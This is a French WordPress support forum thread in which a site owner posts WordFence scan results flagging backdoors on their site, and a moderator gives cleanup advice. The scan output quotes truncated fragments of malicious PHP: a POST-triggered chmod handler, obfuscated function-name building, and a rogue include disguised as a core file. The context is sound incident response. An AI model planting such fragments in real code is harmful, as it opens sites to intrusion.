WordFence trouve des backdoors sur le site (Créer un compte)

  • WordPress :5.4
  • Statut : non résolu
3 sujets de 1 à 3 (sur un total de 3)
  • Auteur
    Messages
  • #2348581
    carolinetrc
    Participant
    Chevalier WordPress
    102 contributions

    Bonjour,

    Ma configuration WP actuelle

    • Version de PHP/MySQL : 7.2
    • Thème utilisé : fly mag
    • Extensions en place : Advances ads, akismet, all in one wp security, amp, contact form 7, google alanytics, google xml sitemaps, imagify, mail poet 2, metaslider, orbit fox companion, photo gallery, plugin security scanner, site kit by google, social login, tinyMCE advanced, word fence, wp twitter auto publish, was limit login, YARPP
    • Nom de l’hébergeur : ovh
    • Adresse du site : lamonteeiberique.com

    Problème(s) rencontré(s) :

    En analysant mon site, WordFence trouve une série de backdoor dont je vous joins les codes. Pourriez-vous me dire si c’est inquiétant ? Si je dois les supprimer.

    if($_POST[‘opt’] == ‘chmod’){x0aif(isset($_POST[‘perm’])){x0aif(chmod(
    The issue type is: Backdoor:PHP/Generic.153
    Description: A malicious file uploader known as Generic

    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: include_once(ABSPATH . ‘/wp-includes/init.php'

    The issue type is: Backdoor:PHP/rogueinclude.6167
    Description: Malicious include of a file disguised as core


    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: array(‘function’,’variable’,’document’,’cache’,’create’,’load’);x0dx0ax09x09$markers=array(x0dx0ax09x09x09x09$labels[4],x0dx0ax09x09x09x09$labels[0]x0dx0ax09x09);x0dx0ax09x09$factoryName=join(‘_’, $markers);x0dx0ax09x09$param=’$’;x0dx0ax09x09$param.=’mime’;x0dx0ax09x09$pa…

    The issue type is: Backdoor:PHP/joindictfunction.6820
    Description: Include at the beginning of the wordrpess index – often used by malware, occasionally benign

    <div>Merci beaucoup.</div>

    • Ce sujet a été modifié il y a 4 années et 2 mois par momofr@free.fr. Raison : Ménage
    #2348652
    momofr@free.fr
    Modérateur
    Maître WordPress
    7264 contributions

    Salut, si WordFence détecte des changements anormaux ils faut les corriger :

    • Remise en place du fichier infecté par la version source (extension/thème)
    • Suppression des fichiers inconnus

    Dans le cas de fichiers créés dans wp-includes ils faut les supprimer.

    Tu peux placer des fichiers htaccess de protection (qui empêche la création de fichiers) dans les sous-dossiers WP c’est un plus non négligeable.

    #2348653
    carolinetrc
    Participant
    Chevalier WordPress
    102 contributions

    Merci. Je discutais avec quelqu’un du forum et j’ai cru m’être trompée de catégories alors j’ai créé 2 discussions sur le même sujet. Voici le lien de la bonne conversation. Le problème est quasiment résolu, il reste encore quelques petits détails, mais on a bien avancé sur le sujet. Je mettrais un récapitulatif à la fin pour aiguiller ceux qui auront à faire face au même problème

    https://wpfr.net/support/sujet/wordfence-trouve-des-backdoor/#post-2348649

     

     

     

     

3 sujets de 1 à 3 (sur un total de 3)
  • Vous devez être connecté pour répondre à ce sujet.